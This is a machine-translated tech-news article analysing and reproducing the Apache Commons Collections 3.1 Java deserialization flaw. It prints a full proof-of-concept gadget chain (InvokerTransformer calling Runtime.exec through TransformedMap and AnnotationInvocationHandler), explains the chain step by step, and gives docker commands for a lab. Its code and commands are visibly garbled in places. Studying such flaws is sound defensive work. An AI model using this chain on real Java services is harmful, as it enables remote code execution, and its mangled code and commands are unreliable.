Shulou(Shulou.com)05/31 Report--

How to analyze and reproduce Apache Commons Collections deserialization vulnerabilities? in view of this problem, this article introduces the corresponding analysis and solutions in detail, hoping to help more partners who want to solve this problem to find a more simple and feasible method.

1.1 statu

Complete vulnerability mining condition analysis and vulnerability reproduction.

1.2 vulnerability analysis

The version with security flaw: below Apache Commons Collections3.2.1, [JDK version: 1.7.0room80] Apache Maven 3.6.3.

POC core code:

Package com.patrilic.vul;import org.apache.commons.collections.Transformer;import org.apache.commons.collections.functors.ConstantTransformer;import org.apache.commons.collections.functors.InvokerTransformer;import org.apache.commons.collections.functors.ChainedTransformer;import org.apache.commons.collections.map.TransformedMap;import java.io.ByteArrayInputStream;import java.io.ByteArrayOutputStream;import java.io.ObjectInputStream;import java.io.ObjectOutputStream;import java.lang.reflect.Constructor;import java.util.HashMap;import java.util.Map Public class EvalObject {public static void main (String [] args) throws Exception {Transformer [] transformers = new Transformer [] {new ConstantTransformer (Runtime.class), new InvokerTransformer ("getMethod", new Class [] {String.class, Class [] .class}, new Object [] {"getRuntime", new Class [0]}), new InvokerTransformer ("invoke", new Class [] {Object.class, Object [] .class}, new Object [] {null, new Object [0]}), / / new InvokerTransformer ("exec") New Class [] {String.class}, new Object [] {"calc"}) new InvokerTransformer ("exec", new Class [] {String.class}, new Object [] {"touch / tmp/CommonsCollections3.1"})} / / store the transformers array in the inherited class ChaniedTransformer Transformer transformerChain = new ChainedTransformer (transformers); / / transformerChain.transform (null); / / create Map and bind transformerChainMap innerMap = new HashMap (); innerMap.put ("value", "value"); Map outerMap = TransformedMap.decorate (innerMap, null, transformerChain); / trigger vulnerability / / Map.Entry onlyElement = (Map.Entry) outerMap.entrySet (). Iterator (). Next () / / onlyElement.setValue ("foobar"); Class clazz = Class.forName ("sun.reflect.annotation.AnnotationInvocationHandler"); Constructor cons = clazz.getDeclaredConstructor (Class.class,Map.class); cons.setAccessible (true); Object ins = cons.newInstance (java.lang.annotation.Retention.class,outerMap); / / serialize ins ByteArrayOutputStream exp = new ByteArrayOutputStream (); ObjectOutputStream oos = new ObjectOutputStream (exp); oos.writeObject (ins); oos.flush (); oos.close () / / take the serialized data stream for deserialization and verify that ByteArrayInputStream out = new ByteArrayInputStream (exp.toByteArray ()); ObjectInputStream ois = new ObjectInputStream (out); Object obj = (Object) ois.readObject (); / /} /}} exploit ideas:

Transformer interface-implementation class-InvokerTransformer (), which can call any function.

To implement Runtime.getRuntime (). Exec (cmd), you call transformer multiple times and take the current returned result as the next input information.

To call Runtime.getRuntime (), consider the ConstantTransformer class, which directly takes the input parameters as output.

ChainedTransformer as the implementation class, for the received Transformer array, use its own transform method (the parameters are input by the user) to process the Transformer array object one by one, and take the result as the input parameter for the next repeated call. A trigger vulnerability can be created by its transform () method.

To find a way to deserialize, where read-in data is deserialized, reverse look for a way to trigger the ChainedTransformer object. Transform () method.

The HashMap class can store data in key-value pairs, and the put (key,value) method can store data.

The function of the TransformedMap class is to store the key-value pair and convert it to the transform objects,decorate () method to create a key-value pair group, and the checkSetValue () method triggers the this.valueTransformer.transform () statement. Reverse looking for a way to call checkSetValue () [1] to make this.valueTransformer a ChainedTransformer object [2].

For [2], the static method decorate () of the TransformedMap class achieves the goal.

For [1], the setValue method of the AbstractInputCheckedMapDecorator class MapEntry static class executes this.parent.checkSetValue (value), then you should make this.parent a TransformedMap object [3].

For [3], forward analyze this code in POC:

Map.Entry onlyElement = (Map.Entry) outerMap.entrySet (). Iterator (). Next ()

Research shows that in the AbstractInputCheckedMapDecorator class many times during execution, the TransformedMap object is assigned to this.parent and the Map.Entry object is returned, which happens to execute the setValue () method and trigger the vulnerability.

To improve versatility, you must try to make calls to deserialization methods trigger vulnerabilities, so consider looking for class objects that satisfy "setValue () that overrides deserialization readObject () and executes Map class object variables, which can be controlled to assign key value data." The AnnotationInvocationHandler class satisfies this requirement [it calls setValue () on each entry of a member variable of type Map].

The Class.forName () function is to load classes.

Then analyze again, for [1], forward analysis of the core code in POC:

Class clazz = Class.forName ("sun.reflect.annotation.AnnotationInvocationHandler"); Constructor cons = clazz.getDeclaredConstructor (Class.class,Map.class); cons.setAccessible (true); Object ins = cons.newInstance (java.lang.annotation.Retention.class,outerMap); … Object obj = (Object) ois.readObject ()

Research shows that the execution process executes the setValue method of the MapEntry static class, and the entrySet method causes the this.parent=TransformedMap object, thus triggering the vulnerability.

Generally speaking, the positive POC construction idea is to construct the ChainedTransformer object first, then create the Map object, then use the TransformedMap class instance to save the ChainedTransformer object to the Map class object, and then obtain the AnnotationInvocationHandler class instance initialized by the Map class object through the reflection method, and serialize it.

1.3 docker recurrence

Download the created docker image and use the following command:

Docker pull 296645429/apache-commons-collections-vulnerability-ubuntu:v1

Set local area network and container ip, launch container, for example:

(1) Custom network

Docker network create-subnet=192.168.10.1/24 testnet

(2) start the docker container

Docker run-p 8088 hostname testt3 8088-p 8081 hostname testt3 8081-it-- hostname testt3-- network testnet-- ip 10.10.10.100 ubuntuxxx:xxx / bin/bash

In the container [Apache-Commons-Collections], execute the command [java-jar commons-collections-3.1.jar], and the file [CommonsCollections3.1] is generated, as shown in the following figure.

This is the answer to the question about how to analyze and reproduce Apache Commons Collections deserialization vulnerabilities. I hope the above content can be of some help to you. If you still have a lot of doubts to be solved, you can follow the industry information channel to learn more about it.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.